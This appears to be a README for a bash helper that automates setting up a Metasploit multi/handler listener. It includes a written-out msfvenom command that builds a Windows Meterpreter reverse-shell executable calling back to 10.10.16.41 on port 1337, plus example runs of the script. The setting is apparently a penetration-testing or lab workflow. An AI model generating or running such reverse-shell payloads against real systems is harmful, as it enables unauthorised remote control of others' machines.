Too lazy to start meterpreter, search for the multi handler, use it, set the payload, set the lhost, set the lport and then run it? .. takes a while, lots of things to type. No More!
Copy and paste your payload, IP and Port from the msfvenom command and execute it.
Let's say you ran this msfvenom command to generate an executable binary for a reverse shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.41 LPORT=1337 -f exe -o lazy.exe
You would then normally need to:
- start Meterpreter
- search for the multi handler
- use it
- set the payload
- set the lhost
- set the lport
- execute it.
Those are a lot of steps and typing or copying and pasting. How about you run this script with the above highlighted part of the msfvenom command copied and pasted?
./MultiHandler.sh windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.41 LPORT=1337
You can also simply type (if you are into that sort of thing) the payload, IP and Port manually and it will work just the same.
./MultiHandler.sh windows/x64/meterpreter/reverse_tcp 10.10.16.41 1337
This quick bash script generates and runs a Meterpreter Resource Script that you can keep using or again, very simply generate another one for a different port if you want.